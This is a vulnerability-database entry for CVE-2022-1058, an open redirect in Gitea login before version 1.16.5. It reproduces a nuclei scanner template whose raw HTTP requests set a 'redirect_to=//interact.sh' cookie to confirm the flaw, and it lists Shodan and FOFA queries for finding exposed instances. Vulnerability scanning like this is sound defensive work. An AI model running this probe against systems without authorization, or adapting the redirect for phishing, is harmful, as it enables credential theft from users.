Gitea <1.16.5 - Open Redirect

Published: 03 Jul 2026 03:01:05
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Gitea <1.16.5 - Open Redirect vulnerability - Allows for open redirect via GitHub repository, potential theft of sensitive informatio

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Huntr | Open Redirect on login | 23 Mar 2022 11:11 | huntr |
| Huntr | Open Redirect on follow/unfollow user's profile action | 7 Jun 2023 07:33 | huntr |
| FreeBSD | gitea -- Open Redirect on login | 23 Mar 2022 00:00 | freebsd |
| ATTACKERKB | CVE-2022-1058 | 24 Mar 2022 15:15 | attackerkb |
| Circl | CVE-2022-1058 | 24 Mar 2022 17:29 | circl |
| CNNVD | Gitea input validation error vulnerability | 24 Mar 2022 00:00 | cnnvd |
| CVE | CVE-2022-1058 | 24 Mar 2022 14:15 | cve |
| Cvelist | CVE-2022-1058 Open Redirect on login in go-gitea/gitea | 24 Mar 2022 14:15 | cvelist |
| EUVD | EUVD-2022-1315 | 24 Mar 2022 14:15 | euvd |
| Tenable Nessus | FreeBSD : gitea -- Open Redirect on login (83466f76-aefe-11ec-b4b6-d05099c0c059) | 29 Mar 2022 00:00 | nessus |

id: CVE-2022-1058

info:
  name: Gitea <1.16.5 - Open Redirect
  author: theamanrawat
  severity: medium
  description: |
    Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
  remediation: |
    Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability.
  reference:
    - https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48
    - https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1058
    cwe-id: CWE-601
    epss-score: 0.53177
    epss-percentile: 0.9885
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gitea
    product: gitea
    shodan-query:
      - title:"Gitea"
      - http.html:"powered by gitea version"
      - http.title:"gitea"
      - cpe:"cpe:2.3:a:gitea:gitea"
    fofa-query:
      - body="powered by gitea version"
      - title="gitea"
    google-query: intitle:"gitea"
  tags: cve,cve2022,huntr,open-redirect,gitea,vuln

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: redirect_to=//interact.sh

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - "//interact.sh"

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="(.*)"'
        internal: true
# digest: 4b0a0048304602210095372a50c4b8f39adad47c2babb72627e8d76493fc66dd7d7155eaf0979bc902022100aaa17152b67e40bdf71b1ec0f5af9530191b03af190631545ce409432a74b3c3:922c64590222798bb761d5b6d8e72950

Scores (04 Feb 2026 07:00, current)
Vulners AI Score: 6.6 (Medium risk)
CVSS 2: 5.8
CVSS 3.1: 6.1
CVSS 3: 7.2
EPSS: 0.53177